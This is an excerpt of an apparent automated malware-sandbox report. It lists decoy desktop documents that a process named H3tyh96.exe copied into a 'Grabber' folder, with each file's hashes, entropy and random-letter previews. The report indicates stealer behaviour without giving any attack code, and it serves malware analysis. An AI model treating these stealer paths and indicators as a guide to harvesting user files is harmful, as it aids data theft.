Preview:	GRXZDKKVDBUGJWVAVQNLKHTVWJFMWUAIFGXJYDZTDDYOZYAHDDDHNXHNVSFVZJEMKSJXGDABHWXKQZCQXBMLFZCFZRGZPZWYYNETLMDWOLDLPIFOVKRDMQEWUEHKITHNGNRTRZWQHFMBDECTTQKFDEVNVHBAPCNMCJNWWITPVACWBIUNPCYFZKGJXCMBWDNHDCVDCGEKHYPPPEGKPCPMYZEKRCOGRHDFANVZFDZEKZWOKLRIOUPCTJCKQPECVEEGNTLJWZOKHSKZRNLJEDQLEQNRWIYLSXHSNVGFTCDJOFJSSGANZFCFSTDUPYBCCAPQWVVVHWQMAMBVDQNABQSQOSDYDMOVPXENCAXSTPDCENIQOWPCOQHPSISEOWFKMBLGAZRALPTAYHDZLKJTCHXGTPXNIVUMCOJRZXPUVUFPCWEAEZMMLATLTGHPJIMHWFBUWIATNBBPFGVFXNULJLRYLAGRNCKVAJADSLQGVLGIYOHDIWUERAQSCTFBMXCMLCXSHZGTWPBCVHUYPVAFSBZNBGAGMHGULJYULEEHPGNBGEQRAOPBXXMZIUIPJMFAOVNMZZTOZGOZOJPKWCEFTTAVUBAADATZYJDWSZEZPLDTGYCYWTSDQTIMZHCKMQLZFEYSYUUWFJSYEFNDDKQMZVTBOZLQBDKFHMMKIYQPFKZLTSHIJVNPHPCTWBWPTTKDHDZEMDVWXXBLPWLCSSBMTLIVOVYOKQCJKTYJWGJUBQUGQVBYJQQLLGTHWSPFLDMDWBTOQUISHXBCHIJKAJFIPBNKMWVQGUSJVNKXAXFDNOBYJXMWRDAZWUJSRMMFQXDPYYKOFBEROBQMDZHDZZHOEIOKDOCHQQDQQRHOROOIFAGQEJZJFZIGPJIRWVNQYZAJAHAWIEFFNXLXQWIUWYSGZDFYPCCGWYBBFQQMSMJBRIUPFBWIHWJWVCYOBNNXKIIWTIXOWRVLFBGPGWFQTGPUNWKWUUMQXIKNCLTTGYHBMKXJ

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Desktop\GRXZDKKVDB\BJZFPPWAPT.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.704346314649071
Encrypted:	false
SSDEEP:	24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
MD5:	8B66CD8FCBCEB253D75DB5CDE6291FA2
SHA1:	6CE0386190B9753849299B268AA7B8D15F9F72E2
SHA-256:	51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
SHA-512:	7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
Malicious:	false
Preview:	BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Desktop\GRXZDKKVDB\DUUDTUBZFW.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701195573484743
Encrypted:	false
SSDEEP:	24:CXuIDWqLgX6vdVaxL46BNaYMbtbF+qEBHi7z/dd0Vc/6cUmeDs:ODHgX6vd0l4gnMbtbF+qEMPdNiTmcs
MD5:	2530C45A92F347020337052A8A7D7B00
SHA1:	7EB2D17587824A2ED8BA10D7C7B05E2180120498
SHA-256:	8BEAEA56B1D06BFFFE6142E95BC808FD28015E6A3FF32BC2FAC4C5A7552FC853
SHA-512:	78F4D4E93139D099D59F17867A6BB87A7DB92E1637A520B522A32DF14D18A39602F1C255C64C4C406BA45138294D9467850FEEA90C199D3434D60AE1C7F6B4DA
Malicious:	false
Preview:	DUUDTUBZFWQODSNPWYYAIDZFECIUBQYLVGHZRZFDGGWVZPGQSHTPZANMRMNDUZLXCVYYIRRTMYEOTHOFJLCKQKOCQKNMRKZTHKIIPBKXIKLDAZFJGRVUHMDDXAMADOCGROYYDTNZZUEROBUVEGQEAZOMYVDGVHXUWCBVRBLFLWITRUFMXJJLQTZTWLOSFUMQDKRZDXVRLBYBKLXGLTGADROPECYTRYJQJWZDWJQHGRYFIQLJDBJUFPEPZLWGXGGDQGOLJCVZAPHJZOSIZQHISQFRJJGEZIJEFACYWHJRHAADQBMDQFJAGFBEZNQNGWDHSAAXOAEHIEHTAEPMOFJSOCRPTEUZGGSVYGVNUAYJPFNXFSYEEMDNDGDUBNXUOHVEJQBDRGSCASTDANAAFPQYQEHHTAOTYKYJJYXDZMUTBXBCIFNYSYWNMYAEEUEIGDANIBIJWTMCMGVDPOCAVEJZDTVMKOQPOOOKMLFWWMOASXZUZVHWZKPBVANJIBBDPCEKXDPEFNTXPTFJRBFUPHQCKMDMMXQPDZLJPURSOLPQREZLEFYXCGNKSFQRMLKDMGSNURCWGNTDQUIOYBPNJAYWOVTXRGROGVHNGIEDBYKUHNRBBDKYQXANPQWPKEOHDUBNRSQPALMLJEQFMXCQMEOAKBRREEJTYCHGUEGBGPJLGWRCLYLAKRESHJPMPCUHRFXHVUIQCQZYDTCNRGWVTYBMIILXIIIOGMHAQBLHFXCLTIKGXWDVRGSSRDNCYOVCLTUUEWRIDEOSWWZKTQLGLSIFPVAFJDGWVZYJUOVTMGGZMWUYOQYCLDNLMKWCJBKOXTWTPCMMIEYMISQTQCKMPNWJVAXPFISOGTRIMGKBHKEJOEDYIGOBOPVFADMXZUZQZVMUDYSPUHDXFZMAVPGIHURQNBZXXDWPSHUEZEFABRCKBUQLCPYBNGKJCWBTBSWMABCFIYQJOHFJJEPNNMRWWMNLOTWSMOXCILCCNICPDFTO

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Desktop\GRXZDKKVDB\EOWRVPQCCS.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692990330209164
Encrypted:	false
SSDEEP:	24:NCzz4hMQMxH70HULgnraTryj1S0KEX64u+O572j79DwzpnQf8A:axH70cauYS0k4u+O125wtnm8A
MD5:	DD71B9C0322AD45992E56A9BCE43FE82
SHA1:	60945B6BC3027451A2E1CFA29D263A994F50E91A
SHA-256:	19AC62FD471E562088365029F7B0672623511CF3E58F2EF6DE1A15C14A2E94E7
SHA-512:	86EA2B42FEB542977FCF534B4708F7A07E09F4ACC413307E660B905408BC4AA9E26C50E907FA02379EA3EBFD18C532CC9DC269B6EA5994E3290082E429CAAE03
Malicious:	false
Preview:	EOWRVPQCCSGUYRPSSKREBPXVQXUWKHGDIJHLBLYMXTIUESLNTSFMRJGDSQHOWECQAJMENKQNNWPVETUPWMXJTCUIAKPCZEENXVLTKYPKROZPDEBFNAJOVCNEXQJFUHQCMLNHGMRJJIPLOMWFWJKKXSTRHWFVLVQPEMFBLDTSCCSXADJIIDQIYCEGSDEDZDWUEJLTYJHMYEHHMBFZCRDHXZVPESWNDGUEFQZTJFSJVKZMWREMIZGAIZANQJKWWXITTXHDQDZOEOGKCEMDUUBDTMNWBRSOWEKQXQDCYJXERQRAMVQCWCTYJPEAJUAWNBRQWGFJAHXJJFRYTZMSGCREPRECKHXXMJGSQEKUCUNCWUAAPBWQVSMWCJGYSLPHJJHJGXSMNLNICJMSGSWRKARHMQXLYSAOPDAPXSMORZLUWYOQTJQNKSCAJWRUEYRFPNOVSMNYRKMTSGRIFLOAJUGJYDTLINOTCEADKRENVYNODFSIJGSDCICIDXZTLLSKKJQSOHYTZRBSHPHXWZOOSKQIRSGPTAOQPBVJAMXOGPYNJMJXAKCTMRRTFCBPOAMNJORWRNZOGZMNBVCCZYQPOQOUXBGKNLFSQWAWEREFQBRDLTVHEFNRUSOARHJPRECDRMPANZRBGCANIUWEBUDVWLYHFTPGBHSZBZBEFUWFHUZPJOVMHGSINZWDUKWPGMGSNSSJNOMETOCJILXRQRGZQFAJCWYQEENIZIMHRBTZUYEOKCQXYLWCKFHOHCOVRVPNTEUARVJEFALBUVYXIYZRMGJWZNYNLPYHZSSCODVXZBIWXIOAVMGMPKCPYIFZIKWRIHNIYASXZLMOLNZOMMYUSCRZBCXRANWWODLPHCXXDPLNYLMHYIUYZJWQLECFNXQEERYDVDBPXOLGZLZQCVYUYKFZGKXWVDQANPXQYAATYFJALGENVLDMHDASWKNNXODUHLXYGCBUKEFWISCCUWXNUNETWMTQHQDJMAXNPFPLMPQO

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Desktop\GRXZDKKVDB\GRXZDKKVDB.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.697358951122591
Encrypted:	false
SSDEEP:	24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
MD5:	244A1B624BD2C9C3A0D660425CB1F3C6
SHA1:	FB6C19991CC49A27F0277F54D88B4522F479BE5F
SHA-256:	E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
SHA-512:	9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
Malicious:	false
Preview:	GRXZDKKVDBUGJWVAVQNLKHTVWJFMWUAIFGXJYDZTDDYOZYAHDDDHNXHNVSFVZJEMKSJXGDABHWXKQZCQXBMLFZCFZRGZPZWYYNETLMDWOLDLPIFOVKRDMQEWUEHKITHNGNRTRZWQHFMBDECTTQKFDEVNVHBAPCNMCJNWWITPVACWBIUNPCYFZKGJXCMBWDNHDCVDCGEKHYPPPEGKPCPMYZEKRCOGRHDFANVZFDZEKZWOKLRIOUPCTJCKQPECVEEGNTLJWZOKHSKZRNLJEDQLEQNRWIYLSXHSNVGFTCDJOFJSSGANZFCFSTDUPYBCCAPQWVVVHWQMAMBVDQNABQSQOSDYDMOVPXENCAXSTPDCENIQOWPCOQHPSISEOWFKMBLGAZRALPTAYHDZLKJTCHXGTPXNIVUMCOJRZXPUVUFPCWEAEZMMLATLTGHPJIMHWFBUWIATNBBPFGVFXNULJLRYLAGRNCKVAJADSLQGVLGIYOHDIWUERAQSCTFBMXCMLCXSHZGTWPBCVHUYPVAFSBZNBGAGMHGULJYULEEHPGNBGEQRAOPBXXMZIUIPJMFAOVNMZZTOZGOZOJPKWCEFTTAVUBAADATZYJDWSZEZPLDTGYCYWTSDQTIMZHCKMQLZFEYSYUUWFJSYEFNDDKQMZVTBOZLQBDKFHMMKIYQPFKZLTSHIJVNPHPCTWBWPTTKDHDZEMDVWXXBLPWLCSSBMTLIVOVYOKQCJKTYJWGJUBQUGQVBYJQQLLGTHWSPFLDMDWBTOQUISHXBCHIJKAJFIPBNKMWVQGUSJVNKXAXFDNOBYJXMWRDAZWUJSRMMFQXDPYYKOFBEROBQMDZHDZZHOEIOKDOCHQQDQQRHOROOIFAGQEJZJFZIGPJIRWVNQYZAJAHAWIEFFNXLXQWIUWYSGZDFYPCCGWYBBFQQMSMJBRIUPFBWIHWJWVCYOBNNXKIIWTIXOWRVLFBGPGWFQTGPUNWKWUUMQXIKNCLTTGYHBMKXJ

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Desktop\GRXZDKKVDB\PALRGUCVEH.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696508269038202
Encrypted:	false
SSDEEP:	24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
MD5:	0E9E92228B27AD7E7B4449467A529B0C
SHA1:	209F92CDFC879EE2B98DEF315CCE166AFEC00331
SHA-256:	284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
SHA-512:	CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
Malicious:	false
Preview:	PALRGUCVEHIRKBYGKJJWKNMNYKFUTLHCEDOTKTWJCZHNZMOUNMNREQTGFDNZTATQQPDFONRIRAZYJEPXQVIVWNBDQIMKULZMUINYTVUPNMQBQQYLGCAJYFEIWZTWGYTHEJPFBRNGCTANCYOISUQMRINVDUEIROITGPJZCCOVCZIZBHLYBDARSNRLEOQQDWOSMHXNRNBXNWMRVAQZUASARYHEITVTVSLHRGBYURPTEUNAUCYMZTXOZXKDXUEUUVTNGWGSBRAWIJZDVZDLMZBKEVESROLUEDPITQGUXFSRFAVNSESAFZLNXMXUYRFUEUKCMNFITMUQEWTCKEGDPOXHJSXBDLFIOLLHDYIVOQVEYJEZMDIOFXZFCPXJEQLPCSHKUGRQKXAUMKTHUMHWFQZRGBRZHGHYRXRODJXEBANQHOOVFBZXKJHDCAAKHZGSWGKGEDWOOCFCEYHPAQBYBKRXOTJWSCPMRDXNRYAQFQHSHOFCHWJDKTFHACROGLPZFWDCIBJSUTMTRHJKEGAHSBAQLDTWPTXBLVYYBNJBKDUNGOUDVWZOBKOJKSMZERYOYBNMDSYUPHFDPUXOMKCYNSEBJHJVXSWTIMBDLPWYMYMQKYICPQEWMYDUMYJRSVQHDEELUFOEQYUIZBTNUNJNZQTDTIJKNOJNFJDDGEYVGDXTQINCQDGJRRPOBRUHQLMKFJSSNNCQMDHWQYMHWIBVNPHRQCBTMYBSOJYXCUAYTWUDETCJTTEQSPXKTRSQBDJYENXLXJTQIYOZHEFAQOFBXKATTASAWEYGDPTTLZDAFVKRYLRNFSWZYBGUMRHHMNPVCVECBEVWEXNMSCXSGJRAQKAYEIULWHXXFKTJWPDMYUAOSFBKCTNCTQQXTLXIIJKYOPYBMSFGYLZDGOXTVIHYLUMJCRDRQXFLBDAUXBTNAPMACHVQILKZSQLNPPJVGXAXUMTOUMJJJYJSPJALITYYHOOMVVOQNOSSPBLMRBWWPYXB

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Desktop\JDDHMPCDUJ.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687055908915499
Encrypted:	false
SSDEEP:	24:X3rfasg2Tpd/zBJY+q9FZP0DJR6BdqWD5gB8H36D6jXLiUk2ZTV:X+52L/dJYBjYJRoddD5C8HqD8ZDZTV
MD5:	94EDB575C55407C555A3F710DF2A8CB3
SHA1:	3AB8DF4B92C320D7D4C661EAB608E24B43F3DD13
SHA-256:	DD3A4A93D60E4B7840557A44DAAF77F6B6F85032C7DD5FB10BE54C07B0E1E261
SHA-512:	F8F78D10AE19735413AF11F0C8DAC41644479D345DC6B300412DEDA9779A01DDFC7150FBFD54F2582A0DF8524B7E507886DBC49E59B084320017E9E64FC8DBFA
Malicious:	false
Preview:	JDDHMPCDUJFORBKGTIFQHFPQNEKFAIHGBDYZBWNZMVTSZXTGRUOCZPQRXMGXBNMAHGODCTVNAHQHZMJYIYXLTVDMEAVEXSWFQCDVPRSSLREITYMWHUXVVKLPJXQJOHYPAVYXSIMBBOTIWYDKNCDVKZZMEIFEDNNXHAHMYLPOUGNKMPZVDEQRUPZBQCKZDQINFECCUZINROAFGLIAMVWHXPPXOWZMWTITWBJFIENEHRXRHRPVUAIUAJUYDBBSQQMTJJXOAAMHVKJEOIQRSNKKQSGCHAUKUYPJEBZIGZTVKUXZEQOUSZPQBHKFHECDNFGTGIDHSJFVLAKZPDYVJVWECRIKKUCCFNNHBLBFCJEKSUZTITTTLQVOHKFHXFIIYDOZNAIBCDIRXJAYKHCOEXBOGSGEGGQEMHFXIZREOFZJSAFXTGSSZLVKYOANMZNPNESDZMFYWTZHIKUSMZXACWZEIMGTFRSZCGICPOSTZRECQYWZECQVLAWXESWPCDXLHIMJHSZJSDAXNXHETAWLZDXTZAPKBHSMKMYYGVSJCUIJSIFUHHMPIRBASPUOUXKKPQCECQBBZUSIXEOXLFFSQIFCTAIRASCMWEHFOXGEJRXFGJODUTKITHEAKFFJQTQNWWKXXDELWDHHEDWUTMSLXQJPVGOBKELYSRBQFYKXFHWGSCVLTCFKOEJMLUXIZVDPFHXHTSMTDRTVCNLISGJFVQRUTMZDYPUYBAEASZCSEUVHWRIQDEJIZQQHJNTIIICFMMPVLXOIVTPCTDKFPDVWXSBXZDXFUMBJTJMKOOHIMIOAKEJSIDIOJSRMRYXLDVGDBBYXARBNHXOXMBXYOTEFOAXRAUKXTWKYYGWNAHHCIIKQHYAETGBWABTEMJKNTEUQAWGHRIKDGGNHUIVVPPYPYTZERZKDPLUSIKPBDPJOCBYQJDEKAVQKHFTPBZJQOUCVBHAHZZGEXOCYGYDCZICBOETRSJSMVEZKINDRIKZYTUIS

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Desktop\KLIZUSIQEN.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696703751818505
Encrypted:	false
SSDEEP:	24:b16WkAmEUwq/rBFGdG3NQGsu7DYh3NTgfAtxoLxLP/VEmcM:hkAYzzbG4NPsuYh3N0fAjaxLnl
MD5:	19255ED5D4F37A096C105CEF82D0F5C0
SHA1:	96C5E995A91C8BC479E1C2ADB32C7E022EB8FAC7
SHA-256:	A0E9C6A5B14DB7AB22994C5017930720299F4492CE99D95A07BEB46BF2BAE7E8
SHA-512:	CDCD7E54677DE3BCE65BD80C855DE9684517F931ECA4D17E984C1D02E5E5CE9B50582ECCFA43F71A4F0A4E1743D74FCF3D588424AF519BFAE628EA49082C6E68
Malicious:	false
Preview:	KLIZUSIQENZWQAFPHPIZMRSSYSYIINGOAPFQHPCFTPTNYLSNMTRTDZSWEBKDRHIUFOFGWKTHENHAQWTYTMOJNOWPWJAPIZKOPDMUAKVTHXYWDBHBVWDTBCFVXJHDCUGTPASHSDSKUVYPRPPUXKURDNZYJENQKRHCARIUAOIAFRFWGQDXOAPXUJAUWRVEASXCVARWJMIPINSQDPGOWLRMNRCAEZGZIYDWBEWCOJWHLMOUROGZKCFGXDKPHAJADQCYUZYSYXQOIEGZIJWZLUJEKZUASKHQOGVFGVEXIQTENJDEKERNBPZGKNXWYZVXDDAYNSFBZAKWCEEYDSJONDKOYOBSAVICMHPZZRHRLNYDOIDQNYLXFDCCUOIJANPQCOIJDXFLDMIBVHBYSNYGAVWTHYCIPBRPTWSQXWXZZJBFNAUOMALKDRYIMJCRJXXQXCEREPQGNQHHOFEMEOXMSZEWOLTOLCOUCQNPRIPXUSVZNATFZKIJQZKGKTCYOMBXFTSXBXYIHMOONWWGRKPSNEMONASEFSVWNWIBXDSMEKQJIDCFPVMGAAUPBVOYAIKYQEFVSXOFTEMHNXVNMMENORLDYPZUSILNZRPHITCWDQMLEFZOEGPJDXQLBSIYRONLBYOSJVTEMBHNVXCMMRDVOAYSMNNRKRLBSQBIWIWHYUMBKTIYQTROZKTGZZMEFWINSQAXMWWLRRSPXAQZURXOTMUHPNLOUWMXRQSGXIAQILQCZUUTRJZVRNLBSHADNHZSDOQIYIZCEZHFRITTHSZOSBZGNCQVHXSFZJCEVSJCZZYTCFXLNBKMTPXYHPDXMMMXHUAAQWYYFHMKXWZBXZBWKFQHLPMVMGYFZBMVSYGKGTOLLJCBFKHHWFIVPPXPTVEJEBZBXHKNYKDYLIAKLLPJZFPVJAROJUOZZUWNZRRDZNYLGBHMNWUKJLSAXBUBWJZYCMVLYBCQJLBOROBDSZGHMCIASVUCVNDTGDALKYLTOMJK

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Desktop\PALRGUCVEH.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696508269038202
Encrypted:	false
SSDEEP:	24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
MD5:	0E9E92228B27AD7E7B4449467A529B0C
SHA1:	209F92CDFC879EE2B98DEF315CCE166AFEC00331
SHA-256:	284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
SHA-512:	CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
Malicious:	false
Preview:	PALRGUCVEHIRKBYGKJJWKNMNYKFUTLHCEDOTKTWJCZHNZMOUNMNREQTGFDNZTATQQPDFONRIRAZYJEPXQVIVWNBDQIMKULZMUINYTVUPNMQBQQYLGCAJYFEIWZTWGYTHEJPFBRNGCTANCYOISUQMRINVDUEIROITGPJZCCOVCZIZBHLYBDARSNRLEOQQDWOSMHXNRNBXNWMRVAQZUASARYHEITVTVSLHRGBYURPTEUNAUCYMZTXOZXKDXUEUUVTNGWGSBRAWIJZDVZDLMZBKEVESROLUEDPITQGUXFSRFAVNSESAFZLNXMXUYRFUEUKCMNFITMUQEWTCKEGDPOXHJSXBDLFIOLLHDYIVOQVEYJEZMDIOFXZFCPXJEQLPCSHKUGRQKXAUMKTHUMHWFQZRGBRZHGHYRXRODJXEBANQHOOVFBZXKJHDCAAKHZGSWGKGEDWOOCFCEYHPAQBYBKRXOTJWSCPMRDXNRYAQFQHSHOFCHWJDKTFHACROGLPZFWDCIBJSUTMTRHJKEGAHSBAQLDTWPTXBLVYYBNJBKDUNGOUDVWZOBKOJKSMZERYOYBNMDSYUPHFDPUXOMKCYNSEBJHJVXSWTIMBDLPWYMYMQKYICPQEWMYDUMYJRSVQHDEELUFOEQYUIZBTNUNJNZQTDTIJKNOJNFJDDGEYVGDXTQINCQDGJRRPOBRUHQLMKFJSSNNCQMDHWQYMHWIBVNPHRQCBTMYBSOJYXCUAYTWUDETCJTTEQSPXKTRSQBDJYENXLXJTQIYOZHEFAQOFBXKATTASAWEYGDPTTLZDAFVKRYLRNFSWZYBGUMRHHMNPVCVECBEVWEXNMSCXSGJRAQKAYEIULWHXXFKTJWPDMYUAOSFBKCTNCTQQXTLXIIJKYOPYBMSFGYLZDGOXTVIHYLUMJCRDRQXFLBDAUXBTNAPMACHVQILKZSQLNPPJVGXAXUMTOUMJJJYJSPJALITYYHOOMVVOQNOSSPBLMRBWWPYXB

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Desktop\PALRGUCVEH.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696508269038202
Encrypted:	false
SSDEEP:	24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
MD5:	0E9E92228B27AD7E7B4449467A529B0C
SHA1:	209F92CDFC879EE2B98DEF315CCE166AFEC00331
SHA-256:	284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
SHA-512:	CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
Malicious:	false
Preview:	PALRGUCVEHIRKBYGKJJWKNMNYKFUTLHCEDOTKTWJCZHNZMOUNMNREQTGFDNZTATQQPDFONRIRAZYJEPXQVIVWNBDQIMKULZMUINYTVUPNMQBQQYLGCAJYFEIWZTWGYTHEJPFBRNGCTANCYOISUQMRINVDUEIROITGPJZCCOVCZIZBHLYBDARSNRLEOQQDWOSMHXNRNBXNWMRVAQZUASARYHEITVTVSLHRGBYURPTEUNAUCYMZTXOZXKDXUEUUVTNGWGSBRAWIJZDVZDLMZBKEVESROLUEDPITQGUXFSRFAVNSESAFZLNXMXUYRFUEUKCMNFITMUQEWTCKEGDPOXHJSXBDLFIOLLHDYIVOQVEYJEZMDIOFXZFCPXJEQLPCSHKUGRQKXAUMKTHUMHWFQZRGBRZHGHYRXRODJXEBANQHOOVFBZXKJHDCAAKHZGSWGKGEDWOOCFCEYHPAQBYBKRXOTJWSCPMRDXNRYAQFQHSHOFCHWJDKTFHACROGLPZFWDCIBJSUTMTRHJKEGAHSBAQLDTWPTXBLVYYBNJBKDUNGOUDVWZOBKOJKSMZERYOYBNMDSYUPHFDPUXOMKCYNSEBJHJVXSWTIMBDLPWYMYMQKYICPQEWMYDUMYJRSVQHDEELUFOEQYUIZBTNUNJNZQTDTIJKNOJNFJDDGEYVGDXTQINCQDGJRRPOBRUHQLMKFJSSNNCQMDHWQYMHWIBVNPHRQCBTMYBSOJYXCUAYTWUDETCJTTEQSPXKTRSQBDJYENXLXJTQIYOZHEFAQOFBXKATTASAWEYGDPTTLZDAFVKRYLRNFSWZYBGUMRHHMNPVCVECBEVWEXNMSCXSGJRAQKAYEIULWHXXFKTJWPDMYUAOSFBKCTNCTQQXTLXIIJKYOPYBMSFGYLZDGOXTVIHYLUMJCRDRQXFLBDAUXBTNAPMACHVQILKZSQLNPPJVGXAXUMTOUMJJJYJSPJALITYYHOOMVVOQNOSSPBLMRBWWPYXB

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Desktop\PALRGUCVEH\GIGIYTFFYT.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.7020597455120665
Encrypted:	false
SSDEEP:	24:Yyd0vLZv9GwBegFWbhTY2P2m1O278kZUU3ZjGaIv:YhLZugsbh0m1bYUpjG9
MD5:	47F4925C44B6916FE1BEE7FBB1ACF777
SHA1:	D7BFAEF09A15A105540FC44D2C307778C0553CE5
SHA-256:	62FB407C253C01957EB5C9ED8075E409FD399C065B6478E5080FDC8573A1AED8
SHA-512:	6B4870B47569942B119533F4C519498D2E7D76FBBD36EC9CAE219BE800864CFA47FC65C98FDDA7D92C0B52F1EA381D7C3D5DC4DE204ABF04CED7F6C43004C1B8
Malicious:	false
